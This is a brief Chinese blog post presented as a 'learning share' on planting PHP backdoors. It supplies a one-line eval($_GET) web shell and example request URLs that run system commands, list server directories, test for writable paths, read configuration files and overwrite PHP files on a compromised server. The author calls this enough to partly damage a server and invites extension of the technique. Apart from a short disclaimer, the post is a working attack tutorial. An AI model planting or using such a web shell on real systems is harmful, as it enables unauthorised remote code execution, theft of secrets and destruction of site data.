分享PHP留后门的一些用法，也就是大家常说的木马病毒

作者：阿dai哥

关于分享说明

About sharing instructions

我为什么要写这篇文章？我写这篇文章的出发点不是教会大家去写什么木马病毒之类的程序，而是分享一下我自己的一个想法，希望这次只是一次简单的学习分享，程序猿都要有自己的底线和初衷。否则就浪费了我写这文章的初心了。

什么是后门？

What is a back door?

今天我就来说一些最常见的PHP留后门的一些用法和注意的地方，也就是大家经常说的木马病毒，哈哈，不要作坏事哦！

实现代码步骤

Code implementation steps

1、<?php eval($_GET['evl']);

就这样，你已经得这台服务器上得很多执行权限了，这是一个比较简单得一种形式。那么使用得场景又有哪些呢？

A：打印服务器：phpinfo

http://www.ceshi.com/a.php?evl=phpinfo()

B：查看某个目录下有什么文件之类的

http://www.ceshi.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));

C：查看目录是否可写，接下来就可以在可写的目录里创建可执行的文件了

http://www.ceshi.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));

D：获取某个文件的内容，一般的情况是涌来读取配置文件的，具体的看自己需求

http://www.ceshi.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));

E：对某个可写目录进行写如文件操作

http://www.ceshi.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));

好咯，以上基本已经可以完成对一个服务器的查看的部分破坏了，如果你想要其它的功能就根据这几条举一反三操作就可以了。这是一些关注PHP后门的简单留门场景，也是一些常用的隐藏方法，时就先写这几个场景把！